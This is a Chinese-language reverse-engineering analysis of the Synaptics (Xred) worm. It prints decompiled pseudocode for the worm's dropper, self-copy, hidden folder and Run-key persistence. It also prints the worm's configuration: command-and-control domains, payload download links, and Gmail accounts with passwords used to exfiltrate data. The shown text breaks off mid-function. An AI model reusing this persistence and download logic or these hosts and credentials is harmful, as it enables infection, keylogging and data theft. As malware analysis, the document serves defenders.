Synaptics 蠕蟲病毒分析
目錄
- Synaptics 蠕蟲病毒分析
- 檔案資訊
- 資原始檔
- 執行流程
- TFormVir_FormCreate
- ControlCenter_49A3E0
- 1、釋放EXERESX並執行 ==》exec_exeres_477AD8
- 2、InjUpdate
- 3、程式已經執行則結束程序
- 4、初始化
- 4.1 Synaptics目錄
- 4.2 服務端配置
- 4.3 判斷程式是否在Synaptics目錄下
- 5、不在Synaptics目錄下時
- 5、在Synaptics目錄下時
- 5.1 感染特定目錄 inj_SpecialFolder_49834C
- 5.2 自動更新 Auto_Update_498270
- 5.3 tcp_client 命令獲取、執行
- 5.4 USB_Hooks
- 5.5 Directory_Watcher
- 5.6 鍵盤記錄 Keyboard_hook
- 5.7 郵件傳送 Auto_Mail_Sender_4974E4
- TFormVir_FormClose
- 處置
檔案資訊
Synaptics 蠕蟲病毒19年出現,至今仍有感染的情況0.0
作業系統: Windows(95)[I386, 32 位, GUI]
編譯器: Borland Delphi(7)[Enterprise]
語言: Object Pascal(Delphi)
VS_VERSION_INFO.StringFileInfo.041F04E6.CompanyName:Synaptics
VS_VERSION_INFO.StringFileInfo.041F04E6.FileDescription:Synaptics Pointing Device Driver
VS_VERSION_INFO.StringFileInfo.041F04E6.FileVersion:1.0.0.4
VS_VERSION_INFO.StringFileInfo.041F04E6.InternalName:
VS_VERSION_INFO.StringFileInfo.041F04E6.LegalCopyright:
VS_VERSION_INFO.StringFileInfo.041F04E6.LegalTrademarks:
VS_VERSION_INFO.StringFileInfo.041F04E6.OriginalFilename:
VS_VERSION_INFO.StringFileInfo.041F04E6.ProductName:Synaptics Pointing Device Driver
VS_VERSION_INFO.StringFileInfo.041F04E6.ProductVersion:1.0.0.0
VS_VERSION_INFO.StringFileInfo.041F04E6.Comments:
字串中包含土耳其語
資原始檔
執行流程
該病毒為delphi程式,入口為TFormVir 視窗,響應FormCreate和FormClose
TFormVir_FormCreate
隱藏視窗工作列圖示:透過設定 WS_EX_TOOLWINDOW,使視窗不會在工作列顯示。
int __fastcall TFormVir_FormCreate(Controls::TWinControl *this)
{
HWND v2; // esi
LONG WindowLongA; // eax
*(_BYTE *)(*Application[0] + 0x5B) = 0;
v2 = *(HWND *)(*Application[0] + 0x30);
WindowLongA = user32_GetWindowLongA(v2, 0xFFFFFFEC);
user32_SetWindowLongA(v2, 0xFFFFFFEC, WindowLongA | WS_EX_TOOLWINDOW);
return ControlCenter_49A3E0(this, 1);
}
ControlCenter_49A3E0
主邏輯
int __fastcall ControlCenter_49A3E0(Controls::TWinControl *this, char flag_ControlCenter)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v25 = 0;
v24 = 0;
v23 = v2;
v22 = v3;
v21 = &savedregs;
v20[1] = (unsigned int)&loc_49A5EF;
v20[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v20);
if ( flag_ControlCenter )
{//程式啟動,視窗建立時;
str_add_4967D4((int)this, (int)"ControlCenter -> Aktif");
if ( !*((_DWORD *)this + 0xC2) )
*((_DWORD *)this + 0xC2) = TCustomApplicationEvents_Create(VMT_45BCE8_TApplicationEvents, 1, this);
v5 = *((_DWORD *)this + 0xC2);
*(_DWORD *)(v5 + 0x44) = this;
*(_DWORD *)(v5 + 0x40) = TFormVir_AppEventsException;
v18 = (void *)isadmin_by_CheckSCManagerAccess_4738BC(0);
Handle = (void *)TWinControl_GetHandle(this);
//釋放RCDATA 資源中的EXERESX,並執行
byte_49F149 = exec_exeres_477AD8(ptr_EXERESX_49D6B8, Handle, v18);
ParamStr(1, &v27);
LStrCmp(v27, "InjUpdate");
if ( v7 )
{
v8 = (const CHAR *)LStrToPChar(Mutex_name_49D6B4[0]);
v9 = kernel32_OpenMutexA(0x1F0001u, 0, v8);
while ( v9 )
{
kernel32_CloseHandle_0(v9);
v10 = (const CHAR *)LStrToPChar(Mutex_name_49D6B4[0]);
v9 = kernel32_OpenMutexA(0x1F0001u, 0, v10);
Get_TempPath_4737B0((int)&v26);
ParamStr(0, &v24);
ExtractFileName(v24);
LStrCat((int)&v26, v25);
if ( FileExists(v26) )
find_and_TerminateProcess_475A94((int)"Synaptics.exe");
}
}
if ( (unsigned __int8)IsProgramAlreadyRunning_47423C((int)Mutex_name_49D6B4[0], 1) )
{
TApplication_Terminate(*(Forms::TApplication **)Application[0]);
}
else
{
init_Synaptics_path_498684((int)this);
init_sysadress_498F04(this);
if ( (unsigned __int8)not_under_Synaptics_appdir_498B40((int)this) )
{
exec_InjUpdate_498998(this);
}
else
{
v19 = StrToBoolDef(flag_TCP_Client_49F1B0, 1);
v17 = StrToBoolDef(flag_useb_hook_49F1B4, 1);
v16 = StrToBoolDef(flag_Directory_Watcher_49F1B8, 1);
v15 = StrToBoolDef(flag_Keyboar_Hook_49F1BC, 1);
v14 = StrToBoolDef(flag_Auto_Mail_Sender_49F1C0, 1);
v13 = StrToBoolDef(flag_Auto_Update_49F1A8, 1);
v11 = StrToBoolDef(flag_inj_spec_exe_and_excel_49F1A4, 1);
handle_49A098(this, v11, v13, v19, v17, v16, v15, v14);
sub_499FAC(this, 1);
}
}
}
else
{
str_add_4967D4((int)this, (int)"ControlCenter -> Pasif");
handle_49A098(this, 0, 0, 0, 0, 0, 0, 0);
}
__writefsdword(0, v20[0]);
v21 = (int *)&loc_49A5F6;
return LStrArrayClr(&v24, 4);
}
1、釋放EXERESX並執行 ==》exec_exeres_477AD8
1、確保釋放EXERESX資源到當前目錄下 ._cache_加檔名
2、執行釋放的檔案(被感染的原始檔案)
char __fastcall exec_exeres_477AD8(void *res_name, void *a2, void *a3)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v30 = _InterlockedExchange((volatile __int32 *)&res_name1, (__int32)a3);
hwnd = (HWND)a2;
res_name1 = res_name;
LStrAddRef(res_name);
v19 = &savedregs;
v18[1] = (unsigned int)&loc_477DAE;
v18[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v18);
v5 = (const CHAR *)LStrToPChar(res_name1);
if ( kernel32_FindResourceA(hmodule, v5, (LPCSTR)0xA) )
{
v29 = 1;
GetCurrentDir(&v26);
v17 = v26;
ParamStr(0, v25);
ExtractFileName(v25[0]);
LStrCatN(&lpFile, 4, v25[1], "._cache_", "\\", v17);
v16 = &savedregs;
v15 = &loc_477D03;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&ExceptionList);
if ( FileExists((int)lpFile) )
{
// ._cache_xxxxx 檔案存在時
if ( (unsigned __int8)find_RCDATA_474C10(lpFile, res_name1) )
{
// 資源存在時,刪除._cache_xxxxx 檔案
FileSetAttr((const int)lpFile, FILE_ATTRIBUTE_NORMAL);
DeleteFile(lpFile);
LStrFromPChar(&v23, v5);
LOBYTE(v7) = 1;
v28 = (Classes::TCustomMemoryStream *)TResourceStream_Create(
(Classes::TResourceStream *)VMT_418FFC_TResourceStream,
v7,
hmodule,
v23,
0xA);
v13 = &savedregs;
v12 = &loc_477CA2;
v11 = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&v11);
// 重新將資源釋放儲存為 ._cache_xxxxx
TCustomMemoryStream_SaveToFile(v28, (unsigned __int16)lpFile);
__writefsdword(0, (unsigned int)v11);
TObject_Free(v28);
}
}
else
{
// 將資源釋放儲存為 ._cache_xxxxx
LStrFromPChar(&v24, v5);
LOBYTE(v6) = 1;
v28 = (Classes::TCustomMemoryStream *)TResourceStream_Create(
(Classes::TResourceStream *)VMT_418FFC_TResourceStream,
v6,
hmodule,
v24,
0xA);
v13 = &savedregs;
v12 = &loc_477BD6;
v11 = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&v11);
TCustomMemoryStream_SaveToFile(v28, (unsigned __int16)lpFile);
__writefsdword(0, (unsigned int)v11);
TObject_Free(v28);
}
__writefsdword(0, (unsigned int)ExceptionList);
v16 = &savedregs;
v15 = &loc_477D81;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&ExceptionList);
FileSetAttr((const int)lpFile, 6u);
get_win_ver_472EF0((int)&v22);
// ShellExecuteExA 執行._cache_xxxxx
v8 = LStrCmp(v22, "XP");
if ( v9 )
{
v13 = 0;
v12 = 0;
build_Parameters_47475C((int *)&lpParameters_1, (int)v5, v3, v4);
exec_473490(hwnd, lpFile, lpParameters_1, (char)v13, (char)v12);
}
else
{
LOBYTE(v8) = v30;
v13 = (int *)v8;
v12 = 0;
build_Parameters_47475C((int *)&lpParameters, (int)v5, v3, v4);
exec_473490(hwnd, lpFile, lpParameters, (char)v13, (char)v12);
}
__writefsdword(0, (unsigned int)ExceptionList);
}
else
{
v29 = 0;
}
__writefsdword(0, v18[0]);
v19 = (int *)&loc_477DB5;
LStrArrayClr(&lpParameters_1, 0xF);
LStrClr(&res_name1);
return v29;
}
ShellExecuteExA執行釋放的檔案(原被感染的程式)
HANDLE __fastcall exec_473490(HWND hwnd, void *lpFile, void *lpParameters_1, char isadmin, char wait)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
lpParameters = lpParameters_1;
lpFile1 = lpFile;
LStrAddRef(lpFile);
LStrAddRef(lpParameters);
v9 = &savedregs;
v8[1] = (unsigned int)&loc_473564;
v8[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v8);
FillChar(&ExecInfo, 0x3C, 0);
ExecInfo.cbSize = 0x3C;
ExecInfo.hwnd = hwnd;
ExecInfo.fMask = 0x440;
ExecInfo.lpFile = (LPCSTR)LStrToPChar(lpFile1);
if ( isadmin )
ExecInfo.lpVerb = "runas";
if ( lpParameters )
ExecInfo.lpParameters = (LPCSTR)LStrToPChar(lpParameters);
ExecInfo.nShow = 1;
if ( shell32_ShellExecuteExA(&ExecInfo) )
{
if ( wait && ExecInfo.hProcess )
{
while ( kernel32_WaitForSingleObject(ExecInfo.hProcess, 0x32u) == WAIT_TIMEOUT )
kernel32_Sleep_0(0x32u);
}
hProcess = ExecInfo.hProcess;
}
else
{
hProcess = 0;
}
__writefsdword(0, v8[0]);
v9 = (int *)&loc_47356B;
LStrArrayClr(&lpParameters, 2);
return hProcess;
}
2、InjUpdate
當帶有執行引數InjUpdate 時 ,嘗試開啟互斥量Synaptics2X,即已存在病毒程序時,判斷TempPath下是否存在同名程式,存在時查詢並結束Synaptics.exe
3、程式已經執行則結束程序
透過互斥量Synaptics2X判斷是否已經存在病毒程序,存在時結束本程序
4、初始化
4.1 Synaptics目錄
- 登錄檔存在
HKEY_LOCAL_MACHINE (管理員時) 或者HKEY_CURRENT_USER 下Software\Synaptics\APPDir 時,獲取值
- 登錄檔不存在時C:\ProgramData\Synaptics
int __fastcall init_Synaptics_path_498684(int a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v4[1] = &loc_49889C;
v4[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v4);
flag_APPIsAdmin_49F148 = isadmin_by_CheckSCManagerAccess_4738BC(0);
get_rcdata_4747D8(ptr_EXEVSNX_49D6BC, &System__AnsiString);
I_EXEVSNX_49F14C = StrToInt(System__AnsiString);
IntToStr(I_EXEVSNX_49F14C, &v14);
LStrAsg(&s_EXEVSNX_49F1C8, v14);
// HKEY_LOCAL_MACHINE (管理員時) 或者HKEY_CURRENT_USER 下Software\Synaptics\APPDir
reg_readstring_4736A4(flag_APPIsAdmin_49F148, "Synaptics", "APPDir", &v16);
if ( v16 && DirectoryExists(v16) )
{
LStrAsg(&Synaptics_appdir_49F144, v16);
ExtractFileName(v16);
LStrAsg(&ptr_Synaptics_49D6A8, v13[1]);
LStrCat3(&ptr_Synaptics_exe_49D6AC, ptr_Synaptics_49D6A8, ".exe");
LStrCat3(&ptr_Synaptics_dll_49D6B0, ptr_Synaptics_49D6A8, ".dll");
}
else
{
get_win_ver_472EF0(v13);
LStrCmp(v13[0], "XP");
if ( v2 )
{
Get_SystemDirectory_4737D8();
LStrCatN(&Synaptics_appdir_49F144, 3, ptr_Synaptics_49D6A8, "\\", v12[1]);
}
else
{
// CSIDL_COMMON_APPDATA
Get_SpecialFolder_4730FC(3, v12);
LStrCatN(&Synaptics_appdir_49F144, 3, ptr_Synaptics_49D6A8, "\\", v12[0]);
}
}
LStrCat3(&v11, "APPDir -> ", Synaptics_appdir_49F144);
str_add_4967D4(a1, v11);
LStrCat3(&v10, "APPDirName -> ", ptr_Synaptics_49D6A8);
str_add_4967D4(a1, v10);
LStrCat3(&v9, "APPFileName -> ", ptr_Synaptics_exe_49D6AC);
str_add_4967D4(a1, v9);
LStrCat3(&v8, "APPKBDDLLName -> ", ptr_Synaptics_dll_49D6B0);
str_add_4967D4(a1, v8);
BoolToStr(flag_APPIsAdmin_49F148, 0, &v6);
LStrCat3(&v7, "APPIsAdmin -> ", v6);
str_add_4967D4(a1, v7);
LStrCat3(&v5, "ExeInj Version -> ", s_EXEVSNX_49F1C8);
str_add_4967D4(a1, v5);
__writefsdword(0, v4[0]);
v4[2] = &loc_4988A3;
return LStrArrayClr(&v5, 0xE);
}
4.2 服務端配置
init_sysadress_498F04
int __fastcall init_sysadress_498F04(void *a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v12 = &loc_49981C;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
v10 = &savedregs;
v9 = &loc_4997F4;
v8 = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &v8);
v1 = TMemIniFile_Create(VMT_42FFF8_TMemIniFile, 1, "cachex.ini");
LOBYTE(v2) = 1;
v77 = TObject_Create(VMT_418BE4_TStringList, v2);
get_rcdata_4747D8("SYSADRESS", &v76);
// SetTextStr
(*(*v77 + 0x2C))(v77, v76, *v77);
// TStrings.GetTextStr
(*(*v77 + 0x1C))(v77, &v74);
LOWORD(v3) = 0x1927;
sub_494A8C(v74, v3, &v75);
// SetTextStr
(*(*v77 + 0x2C))(v77, v75);
// TStringList.GetCount
v4 = (*(*v77 + 0x14))(v77);
// TStringList.Delete
(*(*v77 + 0x48))(v77, v4 - 1);
TMemIniFile_SetStrings(v1, v77);
v8 = 0;
v7 = &v72;
// TMemIniFile.ReadString
(**v1)(v1, "SERVER", "IP1", 0, &v72);
sub_4758E8(v72, "xred.mooo.com", &v73);
LStrAsg(&SERVER_ips_49F150, v73);
v8 = 0;
v7 = &v70;
(**v1)(v1, "SERVER", "IP2", 0, &v70);
sub_4758E8(v70, "http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", &v71);
LStrAsg(&SERVER_ips_49F150 + 1, v71);
v8 = 0;
v7 = &v68;
(**v1)(v1, "SERVER", "IP3", 0, &v68);
sub_4758E8(v68, "xred.mooo.com", &v69);
LStrAsg(&SERVER_ips_49F150 + 2, v69);
v8 = 0;
v7 = &v66;
(**v1)(v1, "SERVER", "PORT", 0, &v66);
sub_4758E8(v66, "1199", &v67);
LStrAsg(&SERVER_ips_49F150 + 3, v67);
v8 = 0;
v7 = &v64;
(**v1)(v1, "SERVER", "CTIME", 0, &v64);
sub_4758E8(v64, "600", &v65);
LStrAsg(&SERVER_ips_49F150 + 4, v65);
v8 = 0;
v7 = &v62;
(**v1)(v1, "SERVER", "CTIMEOUT", 0, &v62);
sub_4758E8(v62, "10", &v63);
LStrAsg(&SERVER_ips_49F150 + 5, v63);
v8 = 0;
v7 = &v60;
(**v1)(v1, "DOWNLOAD", "INIURL1", 0, &v60);
sub_4758E8(v60, "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", &v61);
LStrAsg(&SERVER_ips_49F150 + 9, v61);
v8 = 0;
v7 = &v58;
(**v1)(v1, "DOWNLOAD", "INIURL2", 0, &v58);
sub_4758E8(v58, "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", &v59);
LStrAsg(&SERVER_ips_49F150 + 0xA, v59);
v8 = 0;
v7 = &v56;
(**v1)(v1, "DOWNLOAD", "INIURL3", 0, &v56);
sub_4758E8(v56, "http://xred.site50.net/syn/SUpdate.ini", &v57);
LStrAsg(&SERVER_ips_49F150 + 0xB, v57);
v8 = 0;
v7 = &v54;
(**v1)(v1, "DOWNLOAD", "EXEURL1", 0, &v54);
sub_4758E8(v54, "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", &v55);
LStrAsg(&SERVER_ips_49F150 + 6, v55);
v8 = 0;
v7 = &v52;
(**v1)(v1, "DOWNLOAD", "EXEURL2", 0, &v52);
sub_4758E8(v52, "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", &v53);
LStrAsg(&SERVER_ips_49F150 + 7, v53);
v8 = 0;
v7 = &v50;
(**v1)(v1, "DOWNLOAD", "EXEURL3", 0, &v50);
sub_4758E8(v50, "http://xred.site50.net/syn/Synaptics.rar", &v51);
LStrAsg(&SERVER_ips_49F150 + 8, v51);
v8 = 0;
v7 = &v48;
(**v1)(v1, "DOWNLOAD", "SSLURL1", 0, &v48);
sub_4758E8(v48, "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", &v49);
LStrAsg(&SERVER_ips_49F150 + 0xF, v49);
v8 = 0;
v7 = &v46;
(**v1)(v1, "DOWNLOAD", "SSLURL2", 0, &v46);
sub_4758E8(v46, "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", &v47);
LStrAsg(&SERVER_ips_49F150 + 0x10, v47);
v8 = 0;
v7 = &v44;
(**v1)(v1, "DOWNLOAD", "SSLURL3", 0, &v44);
sub_4758E8(v44, "http://xred.site50.net/syn/SSLLibrary.dll", &v45);
LStrAsg(&SERVER_ips_49F150 + 0x11, v45);
v8 = 0;
v7 = &v42;
(**v1)(v1, "GMAIL", "USERNAME", 0, &v42);
sub_4758E8(v42, "xredline2@gmail.com;xredline3@gmail.com", &v43);
LStrAsg(&SERVER_ips_49F150 + 0x12, v43);
v8 = 0;
v7 = &v40;
(**v1)(v1, "GMAIL", "PASSWORD", 0, &v40);
sub_4758E8(v40, "xredline2**x;xredline3**x", &v41);
LStrAsg(&SERVER_ips_49F150 + 0x13, v41);
v8 = 0;
v7 = &v38;
(**v1)(v1, "GMAIL", "SENDMAIL", 0, &v38);
sub_4758E8(v38, "xredline1@gmail.com", &v39);
LStrAsg(&SERVER_ips_49F150 + 0x14, v39);
v8 = 0;
v7 = &v36;
(**v1)(v1, "ACTIVE", "FIRSTINJ", 0, &v36);
sub_4758E8(v36, "-1", &v37);
LStrAsg(&SERVER_ips_49F150 + 0x15, v37);
v8 = 0;
v7 = &v34;
(**v1)(v1, "ACTIVE", "AUTOUPDATE", 0, &v34);
sub_4758E8(v34, "-1", &v35);
LStrAsg(&SERVER_ips_49F150 + 0x16, v35);
v8 = 0;
v7 = &v32;
(**v1)(v1, "ACTIVE", "AUTOUPDATETIME", 0, &v32);
sub_4758E8(v32, "3600", &v33);
LStrAsg(&SERVER_ips_49F150 + 0x17, v33);
v8 = 0;
v7 = &v30;
(**v1)(v1, "ACTIVE", "CLIENT", 0, &v30);
sub_4758E8(v30, "-1", &v31);
LStrAsg(&SERVER_ips_49F150 + 0x18, v31);
v8 = 0;
v7 = &v28;
(**v1)(v1, "ACTIVE", "USBHOOK", 0, &v28);
sub_4758E8(v28, "-1", &v29);
LStrAsg(&SERVER_ips_49F150 + 0x19, v29);
v8 = 0;
v7 = &v26;
(**v1)(v1, "ACTIVE", "DIRWATCHER", 0, &v26);
sub_4758E8(v26, "-1", &v27);
LStrAsg(&SERVER_ips_49F150 + 0x1A, v27);
v8 = 0;
v7 = &v24;
(**v1)(v1, "ACTIVE", "KEYBOARDHOOK", 0, &v24);
sub_4758E8(v24, "-1", &v25);
LStrAsg(&SERVER_ips_49F150 + 0x1B, v25);
v8 = 0;
v7 = &v22;
(**v1)(v1, "ACTIVE", "AUTOMAIL", 0, &v22);
sub_4758E8(v22, "-1", &v23);
LStrAsg(&SERVER_ips_49F150 + 0x1C, v23);
v8 = 0;
v7 = &v20;
(**v1)(v1, "ACTIVE", "AUTOMAILTIME", 0, &v20);
sub_4758E8(v20, "1800", &v21);
LStrAsg(&SERVER_ips_49F150 + 0x1D, v21);
v8 = 0;
v7 = &v18;
(**v1)(v1, "CLIENT", "AUTORUNINJ", 0, &v18);
sub_4758E8(v18, "0", &v19);
LStrAsg(&SERVER_ips_49F150 + 0x1F, v19);
v8 = 0;
v7 = &v16;
(**v1)(v1, "CLIENT", "EXEINJ", 0, &v16);
sub_4758E8(v16, "-1", &v17);
LStrAsg(&SERVER_ips_49F150 + 0x20, v17);
v8 = 0;
v7 = &v14;
(**v1)(v1, "CLIENT", "EXELINJ", 0, &v14);
sub_4758E8(v14, "-1", &v15);
LStrAsg(&SERVER_ips_49F150 + 0x21, v15);
TObject_Free(v77);
TObject_Free(v1);
v8 = &savedregs;
v7 = &loc_4997E0;
v6 = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &v6);
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 3)) )
LStrAsg(&SERVER_ips_49F150 + 3, "1199");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 4)) )
LStrAsg(&SERVER_ips_49F150 + 4, "600");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 5)) )
LStrAsg(&SERVER_ips_49F150 + 5, "10");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x15)) )
LStrAsg(&SERVER_ips_49F150 + 0x15, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x16)) )
LStrAsg(&SERVER_ips_49F150 + 0x16, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x17)) )
LStrAsg(&SERVER_ips_49F150 + 0x17, "3600");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x18)) )
LStrAsg(&SERVER_ips_49F150 + 0x18, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x19)) )
LStrAsg(&SERVER_ips_49F150 + 0x19, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x1A)) )
LStrAsg(&SERVER_ips_49F150 + 0x1A, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x1B)) )
LStrAsg(&SERVER_ips_49F150 + 0x1B, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x1C)) )
LStrAsg(&SERVER_ips_49F150 + 0x1C, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x1D)) )
LStrAsg(&SERVER_ips_49F150 + 0x1D, "1800");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x1F)) )
LStrAsg(&SERVER_ips_49F150 + 0x1F, "0");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x20)) )
LStrAsg(&SERVER_ips_49F150 + 0x20, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x21)) )
LStrAsg(&SERVER_ips_49F150 + 0x21, "-1");
__writefsdword(0, v6);
__writefsdword(0, v9);
__writefsdword(0, v12);
v13 = &loc_499823;
return LStrArrayClr(&v14, 0x3F);
}
4.3 判斷程式是否在Synaptics目錄下
if ( not_under_Synaptics_appdir_498B40(this) )// 在Synaptics_appdir 目錄下則跳過
// 否則CreateDir 複製程式,更新資源
{
// 程式不在Synaptics目錄時
// 附帶引數InjUpdate再次啟動
exec_InjUpdate_498998(this);
}
else
{
// 當前程式位於Synaptics目錄時
v19 = StrToBoolDef(flag_TCP_Client_49F1B0, 1);
v17 = StrToBoolDef(flag_useb_hook_49F1B4, 1);
v16 = StrToBoolDef(flag_Directory_Watcher_49F1B8, 1);
v15 = StrToBoolDef(flag_Keyboar_Hook_49F1BC, 1);
v14 = StrToBoolDef(flag_Auto_Mail_Sender_49F1C0, 1);
v13 = StrToBoolDef(flag_Auto_Update_49F1A8, 1);
v11 = StrToBoolDef(flag_inj_spec_exe_and_excel_49F1A4, 1);
handle_49A098(this, v11, v13, v19, v17, v16, v15, v14);
regmon_run_and_inj_499FAC(this, 1);
}
當程式不在Synaptics_appdir 目錄下時
-
Synaptics目錄不存在時建立,設定屬性FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM
-
複製檔案到Synaptics目錄下Synaptics.exe
-
移除EXERESX資源,即Synaptics.exe將只存在病毒本體,不含被感染的原始檔
-
設定登錄檔Run開機自啟動 "Synaptics Pointing Device Driver"
int __fastcall not_under_Synaptics_appdir_498B40(int a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v29 = a1;
v12[2] = &savedregs;
v12[1] = &loc_498E26;
v12[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v12);
ParamStr(0, &System__AnsiString);
ExtractFileDir(System__AnsiString, &v26);
LStrCmp(v26, Synaptics_appdir_49F144);
if ( v1 )
{
// 當前程式位於Synaptics目錄時返回0
v28 = 0;
}
else
{
// 不在Synaptics目錄返回1
v28 = 1;
if ( !DirectoryExists(Synaptics_appdir_49F144) )
{
// 當Synaptics目錄不存在時建立目錄
v11 = &savedregs;
v10 = &loc_498C00;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
v2 = LStrToPChar(Synaptics_appdir_49F144);
LStrFromPChar(&v24, v2);
CreateDir(v24);
// FILE_ATTRIBUTE_HIDDEN
// 2 (0x2)
// 檔案或目錄處於隱藏狀態。 它不包括在普通目錄列表中。
// FILE_ATTRIBUTE_SYSTEM
// 4 (0x4)
// 作業系統使用其中的一部分或獨佔使用的檔案或目錄。
FileSetAttr(Synaptics_appdir_49F144, 6u);
LStrCat3(&v23, "CreateDir -> ", Synaptics_appdir_49F144);
str_add_4967D4(v29, v23);
__writefsdword(0, ExceptionList);
}
v11 = &savedregs;
v10 = &loc_498C8A;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
ParamStr(0, &v22);
v8[6] = v22;
LStrCatN(&dest, 3, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144);
// 複製檔案到Synaptics目錄下Synaptics.exe
copy_file_473804(v8[3], dest, 6u);
LStrCatN(&v20, 4, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144, "APP Copy -> ");
str_add_4967D4(v29, v20);
__writefsdword(0, v8[0]);
v8[2] = &savedregs;
v8[1] = &loc_498D22;
v8[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v8);
LStrCatN(&v19, 3, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144);
if ( FileExists(v19) )
{
LStrCatN(&v18, 3, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144);
// 移除EXERESX資源,即Synaptics.exe將只存在病毒本體,不含被感染的原始檔
remove_res_474B04(v18, 0, ptr_EXERESX_49D6B8);
LStrCat3(&v17, "Update Res -> ", ptr_EXERESX_49D6B8);
str_add_4967D4(v29, v17);
}
__writefsdword(0, v7[0]);
v7[2] = &savedregs;
v7[1] = &loc_498DFB;
v7[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v7);
ParamStr(0, &v16);
get_info_474948(v16, "ProductName", &v27);
if ( !v27 )
{
ParamStr(0, &v15);
get_info_474948(v15, "FileDescription", &v27);
}
if ( !v27 )
LStrLAsg(&v27, "Synaptics Pointing Device Driver");
isadmin_by_CheckSCManagerAccess_4738BC(0);
LStrCatN(&fpath, 3, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144);
// 設定自啟動
// Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg_set_Run_47357C(v6, v27, fpath);
LStrCatN(&v13, 6, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144, " = ", v27, "Set Reg -> ");
str_add_4967D4(v29, v13);
__writefsdword(0, v4);
}
__writefsdword(0, v5);
result = LStrArrayClr(&v13, 0xF);
LOBYTE(result) = v28;
return result;
}
5、不在Synaptics目錄下時
// 程式不在Synaptics目錄時
// 附帶引數InjUpdate再次啟動
exec_InjUpdate_498998
int __fastcall exec_InjUpdate_498998(Controls::TWinControl *this)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
dest = 0;
v23 = 0;
v22 = v1;
v21 = v3;
v20 = v2;
v19[2] = &savedregs;
v19[1] = &loc_498B06;
v19[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v19);
v18 = &savedregs;
v17[1] = &loc_498AE1;
v17[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v17);
get_win_ver_472EF0(&v26);
LStrCmp(v26, "XP");
if ( v5 )
{
Handle = TWinControl_GetHandle(this);
LStrCatN(&v23, 3, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144);
if ( exec_473490(v11, v23, "InjUpdate", v15, v13) )
LABEL_6:
TApplication_Terminate(*Application[0]);
}
else
{
Handle = TWinControl_GetHandle(this);
LStrCatN(&lpFile, 3, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144);
if ( exec_473490(v10, lpFile, "InjUpdate", v14, v12) )
goto LABEL_6;
TWinControl_GetHandle(this);
